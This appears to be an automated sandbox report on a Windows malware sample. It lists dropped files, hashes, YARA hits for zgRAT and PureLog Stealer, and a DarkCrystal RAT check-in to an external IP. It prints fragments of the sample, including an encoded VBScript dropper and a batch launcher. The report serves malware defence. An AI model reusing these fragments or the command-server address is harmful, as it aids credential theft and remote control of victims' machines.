MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\sbJHDJmG.log

Download File

Process:	C:\winRefruntime\MsAgentDriverruntime.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\viSXCyGd.log

Download File

Process:	C:\Recovery\WBnjVTGHzbhirvM.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\wJQffXMu.log

Download File

Process:	C:\winRefruntime\MsAgentDriverruntime.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Windows\PLA\Templates\2f08a7aa5b4dd8

Download File

Process:	C:\winRefruntime\MsAgentDriverruntime.exe
File Type:	ASCII text, with very long lines (559), with no line terminators
Category:	dropped
Size (bytes):	559
Entropy (8bit):	5.873015305176706
Encrypted:	false
SSDEEP:	12:WxxQUqPvmD/d9cw1CBHLZqUPJRLimadpcnxzqPBNI:WRsuZUdLsUxRema2IpNI
MD5:	30492F0D9C97E59FF2D8EC0782C6765A
SHA1:	811C5CE757F766E957E623833EFCD77997106D74
SHA-256:	6B52658BAD2CEC2A81B3C6B0A21E7C3813F43D32406DC6CCD8C06786A4E36D4D
SHA-512:	5F02535102D59A551034CAFEEFF742151BCB3CF026849F072F91589EADD8DEAA079B5820015658746B157B3B32E4FBD4B162AC5E446E71124B2875E2A2904600
Malicious:	false
Preview:	iZozYidY9kO9TuCfJIWZXXwR0ak6o2FCONXqS2DdnflXn9VknPxYk6LKmW987huGfMvGXWNRF2v2wZo0EASYFqbRCND53FgFuf1aOPNRCfTrKSYNrI36PWAyueDJSRXAWqHQhOmyxBVjXtGtz0NvLj0XeCpuLD8vISVeKHpdfEJNBbbBXUUcDmyx0uwfi2ntCjbEYlirKuPGZmWCloW1tgsgdioaUK4nbaLb9WmvvmRSWsXNXt44fv9g15k07HXAzmo8b5DOBlFGOZKvKaDlPAHqaojEwwynPQdtEYwbqp24p3RcvzpgEvuzf7iwW8bPwc175arwol4kHNBhXGT7HSjdfnOG0AFrNnHNBTgUH31c0KsR6AZPpeIe2XbSMl5ofNWeFxgDj8zOaGmV56J0l0CtfmUn2OIg7N6nyNMIeWpqo4EwvGWQcFDpKm9cd2KV0TQMJ8grtAWOKVEkii2v11E2KRdLOtplLT0Vn2mwjpgbtyfziY459Ze8PXB2fVcAUuD0et7p5GLMVmJWwnn0yumvz2FP0tQOMgH8uoUybO93OSm

C:\Windows\PLA\Templates\WBnjVTGHzbhirvM.exe

Download File

Process:	C:\winRefruntime\MsAgentDriverruntime.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1915392
Entropy (8bit):	7.539404623748641
Encrypted:	false
SSDEEP:	24576:zHaYHemPiKIUdWp9NZAXY000Ub/TdvsXhhbtRtAC+IEZ9rSyzPXcWPdzw25/nNy:DJRIfpxAXalU7tPA3IEHHPo25fN
MD5:	C3A0C717ED8A025658E5A4C0F53281D9
SHA1:	1E7EDDFCC83D9B03D69DBAAA64E925792FD6C76D
SHA-256:	E1B05CF5E4C9736A90867217DD7208573BACB4822E4083C999A8212CB59C83DD
SHA-512:	C359A40A89D5CF191DD08D81D6077364B6B974E4E83DDAAB6BA04DF8098AA9742CF73BF5170E5E528CC255C0CEDA39905B7A84FA30DB2118CC62B855F839A501
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....cxg.................2...........P... ...`....@.. ....................................@.................................pP..K....`.. ............................................................................ ............... ..H............text....0... ...2.................. ..`.rsrc... ....`.......4..............@....reloc...............8..............@..B.................P......H...........T................u...O.......................................0..........(.... ........8........E........M...N...)...8....(.... ....~....{n...9....& ....8....(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8y......0..Q....... ........8........E........Z...N...............)...8....8O... ....~....{....9....& ....8.......... ....~....{....:....& ....8....r...ps....z~....9.... ....~....{....9g...& ....8\.......~....(Z...~....(^... ....<.... ....80.

C:\winRefruntime\0jfMNzpItgnyb3dolhtjTtJBeKE8V11tqFqpGcy14sQRgDlNdePdmeq.vbe

Download File

Process:	C:\Users\user\Desktop\0V2JsCrGUB.exe
File Type:	data
Category:	dropped
Size (bytes):	204
Entropy (8bit):	5.777671100199272
Encrypted:	false
SSDEEP:	6:GVWvwqK+NkLzWbHhE18nZNDd3RL1wQJRQFj1zS9/bgAME1:GVW2MCzWLy14d3XBJaFZGrMi
MD5:	F71D833E6AEB52188EE610B077D8CCC6
SHA1:	D75CB50568151B006529144B7E9176CEB10D20EC
SHA-256:	FE1E34B8C3B97E4D9D228456CBD70C882751AC3566C4DB9AC0C0DD69736A8506
SHA-512:	6B40363E6805BBD53A700DF9606CE9005C739F9D03C229F970F5487FFD292454EBEFDA13155161516EC847ABDFB6F61F8C67FFB281A1E476823DD2BF1127DA06
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^swAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v%T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJhr.I.0D!xDr:.z&KRH"1.!mT-sq2R(COJBPZ~~0Csk+iTgAAA==^#~@.

C:\winRefruntime\MsAgentDriverruntime.exe

Download File

Process:	C:\Users\user\Desktop\0V2JsCrGUB.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1915392
Entropy (8bit):	7.539404623748641
Encrypted:	false
SSDEEP:	24576:zHaYHemPiKIUdWp9NZAXY000Ub/TdvsXhhbtRtAC+IEZ9rSyzPXcWPdzw25/nNy:DJRIfpxAXalU7tPA3IEHHPo25fN
MD5:	C3A0C717ED8A025658E5A4C0F53281D9
SHA1:	1E7EDDFCC83D9B03D69DBAAA64E925792FD6C76D
SHA-256:	E1B05CF5E4C9736A90867217DD7208573BACB4822E4083C999A8212CB59C83DD
SHA-512:	C359A40A89D5CF191DD08D81D6077364B6B974E4E83DDAAB6BA04DF8098AA9742CF73BF5170E5E528CC255C0CEDA39905B7A84FA30DB2118CC62B855F839A501
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\winRefruntime\MsAgentDriverruntime.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\winRefruntime\MsAgentDriverruntime.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....cxg.................2...........P... ...`....@.. ....................................@.................................pP..K....`.. ............................................................................ ............... ..H............text....0... ...2.................. ..`.rsrc... ....`.......4..............@....reloc...............8..............@..B.................P......H...........T................u...O.......................................0..........(.... ........8........E........M...N...)...8....(.... ....~....{n...9....& ....8....(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8y......0..Q....... ........8........E........Z...N...............)...8....8O... ....~....{....9....& ....8.......... ....~....{....:....& ....8....r...ps....z~....9.... ....~....{....9g...& ....8\.......~....(Z...~....(^... ....<.... ....80.

C:\winRefruntime\T8Mz9n0cgvFWE.bat

Download File

Process:	C:\Users\user\Desktop\0V2JsCrGUB.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	95
Entropy (8bit):	5.066835478181785
Encrypted:	false
SSDEEP:	3:yIyWzdtvAosKb6AIQh+oL3meOKoDHrAlOLAEAwA:yAzduKWATTHOKoDslOJA1
MD5:	ADF2BF7BF445880F81F96361A56948EF
SHA1:	59B5B4BC70D488217DA1B2C2B5B64D5FC968EB8E
SHA-256:	AD92ED1E126ADFFDA821E88EC4DBB6DAB360D69B94871228A63E2DD0601065E0
SHA-512:	202865468A0FA699788AFECA8B3B1EB5296E98D56958C2EDC0EA83191A192EBB7E620029632E7D7671BEE749BF3DD8781D4497F461894F10451EDC985C41324E
Malicious:	false
Preview:	%DpFSMmWDJPG%%cQDruasJujb%..%gNIoQGavupmuDJv%"C:\winRefruntime/MsAgentDriverruntime.exe"%ycqku%

C:\winRefruntime\c15a51ac2517ec

Download File

Process:	C:\winRefruntime\MsAgentDriverruntime.exe
File Type:	ASCII text, with very long lines (377), with no line terminators
Category:	dropped
Size (bytes):	377
Entropy (8bit):	5.844439444820598
Encrypted:	false
SSDEEP:	6:UsTHHiHKFUtWiSQVRocGZJS5SI7oD9xCIGAr7ms4u6jZhROzkUf6jLMel:DTniqFDxQ0LZz/+IG27DaeQ0uz
MD5:	189C52F096C68F95A2F7EFE27EFC1F12
SHA1:	7926EB96652BB5858099F2470B8372E0111FE1FB
SHA-256:	338582DDE9803E1CB7D5402045167DC2E44B92A977E507BD8BEF527D7E03B682
SHA-512:	8CF722210865A7D95C301FA1B2BAD9F7150B53B0380BF9C3E0366C136096C4C7456DD9D6379CC12888F63A3AB87F595070DCBEF5A7182AE92CCAB5E1839B8CE1
Malicious:	false
Preview:	0FhrFZ4VSpX0NJGGHYfNvCDi7FcfjkMi6gtpXWVAFTZvOXLtALhQ7klyB8uA6Zwsdy3qabsuCeHbnSTk4tfYD6lV44nYlVEqhqSadeSicwNcdKKtpKGM3XogNhwfxUJqab3693GZb75RsJ2ut4tbP1wJCvM6swuIngBCQOtvEqv6cXyDoBw3lsbjou4OqJroMxoLI0efL7WjGzro6JSqA1g4FcXgUeE48Guotn5yhQrnV1czCPRh1AoUQtFpd8Lq2ckAFD4TNdJtJ3jN9hdENhD8bZXAhPUjFAu2Rcu8U7TX05LXJ2q5eGdVZmipq4w8JknIIr6hxftPNpHgO90pjZE8hZdp3ESaLVOQRCPc5IH9XOHteCbqDHYtf

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.8765887326094015
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXhXVXQu9lbPfGZLAHKvo9iJ6qNvj:Vx993DEUqtB9JPCE1cJ6M
MD5:	C2163D90B5ACDC3A31DE0469EF05A630
SHA1:	F39F627F1DE3F4A769FA0CF3B3848B9062E51D08
SHA-256:	993E6EE9E773BDBB8A16FECFFC8F3B4A83BE515899B659B3A92F8C0398376233
SHA-512:	79C8DB11B0A37537216B8A046FB56C0A0AE47FBAB4262858E6ABEBF05FE3AFC2BA43BFA37F0307DD14BD9B353330F2819F7BF5DD9E12D233629080836BC2C4F9
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 09/01/2025 13:56:51..13:56:51, error: 0x80072746.13:56:56, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.476899542939037
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	0V2JsCrGUB.exe
File size:	2'237'197 bytes
MD5:	4e9ddbfbeb41bd97825e0f79426307cb
SHA1:	f7c1150945e4d9ac8f86b0e0c5ee5f2441e1983b
SHA256:	f0a78b4d2a7cc344b747116e39e0d59231d05f9b6456392977de364414c9c987
SHA512:	b73e5343ef1c7f662e8c134db76a639228eb2ef7e3d3c78648a1b329986243c5d1e43c57541e4f5392dfc44bf967942f093b511cb3dff7390f352168635e2dca
SSDEEP:	24576:2TbBv5rUyXVIHaYHemPiKIUdWp9NZAXY000Ub/TdvsXhhbtRtAC+IEZ9rSyzPXcE:IBJwJRIfpxAXalU7tPA3IEHHPo25fNJ
TLSH:	8EA5BF5669D14E32C6706B318697123D92A0D7223A12EF1B361F30D2B9077F9DB762B3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Entrypoint Preview

Instruction
call 00007F75E8DE855Bh
jmp 00007F75E8DE7E6Dh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F75E8DDACB7h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007F75E8DEB2FFh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007F75E8DE7FFCh
push 0000000Ch
push esi
call 00007F75E8DE75B9h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F75E8DDAC32h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F75E8DEADB9h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F75E8DE7F78h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F75E8DEAD9Ch
int3
jmp 00007F75E8DEC837h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0xdff8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x72000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	2831bb8b11e3209658a53131886cdf98	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	042f11346230ca5aa360727d9908e809	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	9670b581969e508258d8bc903025de5e	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	c83554035c63bb446c6208d0c8fa0256	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0xdff8	0xe000	ba08fbcd0ed7d9e6a268d75148d9914b	False	0.6373639787946429	data	6.638661032196024	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x72000	0x233c	0x2400	40b5e17755fd6fdd34de06e5cdb7f711	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x64650	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x65198	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x66748	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x66cb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x67558	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x68400	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x68868	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x69910	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x6beb8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x70588	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x70358	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x70498	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x70228	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x6fef0	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6fc98	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x70f68	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x71150	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x71320	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x714d8	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x71620	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x71a90	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x71bf8	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x71d50	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x71e60	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x71f20	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x6fc30	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x70810	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-09T18:12:14.768552+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49732	104.21.38.84	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 18:12:14.228245020 CET	49732	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:14.233558893 CET	80	49732	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:14.233692884 CET	49732	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:14.234020948 CET	49732	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:14.239651918 CET	80	49732	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:14.582132101 CET	49732	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:14.587286949 CET	80	49732	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:14.718516111 CET	80	49732	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:14.768552065 CET	49732	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:15.000421047 CET	80	49732	104.21.38.84	192.168.2.4
